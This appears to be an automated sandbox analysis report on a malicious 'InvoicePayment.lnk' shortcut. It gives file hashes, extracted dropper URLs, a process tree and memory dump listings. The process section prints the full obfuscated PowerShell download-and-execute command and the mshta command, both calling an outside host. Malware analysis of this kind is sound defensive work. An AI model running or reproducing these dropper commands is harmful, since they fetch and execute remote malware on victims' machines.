Analysis
-
max time kernel
1579s -
max time network
1579s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
15-01-2021 15:43
Static task
static1
Behavioral task
behavioral1
Sample
InvoicePayment.lnk
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
General
-
Target
InvoicePayment.lnk
-
Size
2KB
-
MD5
0e2623d2481a945842960b2d96759d32
-
SHA1
86ad7f3465926187a5243aad50e25e88d8fb716e
-
SHA256
83bc020498d9001a23acf434ab33346aea54c19fd27040751e2e61c8cd793b51
-
SHA512
6503c4f1dd32a69c873020b95e36f794bfd1f2f00a14f3f73da5ff9902bce22dabff513ce47348c447cac1e88d82654951865baf4d1f767920308e68c9546c3a
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://www.minpic.de/k/bgmj/168l7q/
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://www.minpic.de/k/bgmi/113snm/
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exepowershell.exeflow pid process 6 884 mshta.exe 8 884 mshta.exe 9 776 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 776 powershell.exe 776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 776 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exemshta.exedescription pid process target process PID 1640 wrote to memory of 884 1640 cmd.exe mshta.exe PID 1640 wrote to memory of 884 1640 cmd.exe mshta.exe PID 1640 wrote to memory of 884 1640 cmd.exe mshta.exe PID 884 wrote to memory of 776 884 mshta.exe powershell.exe PID 884 wrote to memory of 776 884 mshta.exe powershell.exe PID 884 wrote to memory of 776 884 mshta.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\InvoicePayment.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "https://www.minpic.de/k/bgmj/168l7q/"2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://www.minpic.de/k/bgmi/113snm/'))))3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/776-4-0x0000000000000000-mapping.dmp
-
memory/776-5-0x000007FEF35D0000-0x000007FEF3FBC000-memory.dmpFilesize
9.9MB
-
memory/776-6-0x0000000001DA0000-0x0000000001DA1000-memory.dmpFilesize
4KB
-
memory/776-7-0x000000001AC80000-0x000000001AC81000-memory.dmpFilesize
4KB
-
memory/776-8-0x0000000002580000-0x0000000002581000-memory.dmpFilesize
4KB
-
memory/776-9-0x0000000001E70000-0x0000000001E71000-memory.dmpFilesize
4KB
-
memory/776-10-0x000000001B7F0000-0x000000001B7F1000-memory.dmpFilesize
4KB
-
memory/776-11-0x0000000002640000-0x0000000002641000-memory.dmpFilesize
4KB
-
memory/776-12-0x0000000002860000-0x0000000002861000-memory.dmpFilesize
4KB
-
memory/776-13-0x0000000002890000-0x0000000002891000-memory.dmpFilesize
4KB
-
memory/884-2-0x0000000000000000-mapping.dmp
-
memory/1972-3-0x000007FEF7B10000-0x000007FEF7D8A000-memory.dmpFilesize
2.5MB